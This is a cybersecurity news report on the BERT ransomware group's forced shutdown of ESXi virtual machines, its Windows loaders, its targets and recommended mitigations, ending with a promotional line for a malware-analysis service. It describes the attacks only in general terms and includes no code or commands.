BERT Ransomware Forcibly Shut Down ESXi Virtual Machines to Disrupt Recovery

New ransomware group employs advanced virtualization attack tactics to maximize damage and hinder organizational recovery efforts.

A newly emerged ransomware group known as BERT has introduced a particularly disruptive capability that sets it apart from traditional ransomware operations: the ability to forcibly terminate ESXi virtual machines before encryption, significantly complicating recovery efforts for targeted organizations.

First observed in April 2025, BERT (tracked by Trend Micro as Water Pombero) has quickly established itself as a serious threat to virtualized environments across Asia, Europe, and the United States.

Advanced Virtual Machine Targeting

The ransomware’s most concerning feature lies in its Linux variant, which can detect and forcibly shut down ESXi virtual machines before proceeding with file encryption.

This tactical approach ensures that virtual machines cannot continue running during the attack, preventing administrators from quickly migrating or backing up critical systems.

The malware executes commands that force the termination of all running VM processes on ESXi hosts, maximizing operational disruption.

Diagram of VMware vSphere architecture showing clients, vCenter Server, application and infrastructure services, and physical enterprise servers, network, and storage virtualization.

BERT’s Linux implementation supports up to 50 concurrent threads for rapid encryption, allowing the ransomware to process large virtualized environments efficiently.

When executed without command line parameters, the malware automatically proceeds to shut down virtual machines using built-in ESXi commands, demonstrating sophisticated knowledge of VMware infrastructure.

The ransomware group has developed variants targeting Windows, Linux, and ESXi platforms simultaneously, enabling comprehensive attacks across hybrid IT environments.

On Windows systems, BERT employs PowerShell-based loaders that disable security features including Windows Defender, firewalls, and User Account Control before downloading the main payload from Russian infrastructure.

The group’s targeting strategy focuses primarily on healthcare, technology, and event services sectors, with confirmed victims spanning multiple continents.

Security researchers have identified connections between BERT’s codebase and previously leaked REvil Linux variants, suggesting the group may have repurposed existing ransomware frameworks for enhanced effectiveness.

The forced shutdown capability represents a significant escalation in ransomware tactics, as it directly undermines disaster recovery procedures that organizations rely upon during cyber incidents.

Traditional recovery methods often involve quickly spinning up backup virtual machines or migrating workloads to alternate hosts, but BERT’s approach eliminates these options by systematically terminating all VM processes.

Organizations using VMware ESXi hypervisors face particular risk, as a single compromised hypervisor can affect dozens of virtual machines simultaneously.

The ransomware appends different file extensions depending on the target platform: “.encryptedbybert” on Windows systems and “.encrypted_by_bert” on Linux and ESXi environments.

Mitigations

Cybersecurity experts recommend implementing enhanced monitoring for PowerShell abuse and unauthorized script execution, particularly focusing on loaders that disable security tools.

Organizations should also consider network segmentation to isolate ESXi management interfaces and implement robust backup strategies that include offline and immutable copies.

The emergence of BERT underscores the evolving sophistication of ransomware operations and their increasing focus on virtualized infrastructure.

As organizations continue to consolidate workloads onto virtualization platforms, the potential impact of such targeted attacks will only grow, making proactive defense measures more critical than ever.

Investigate live malware behavior, trace every step of an attack, and make faster, smarter security decisions -> Try ANY.RUN now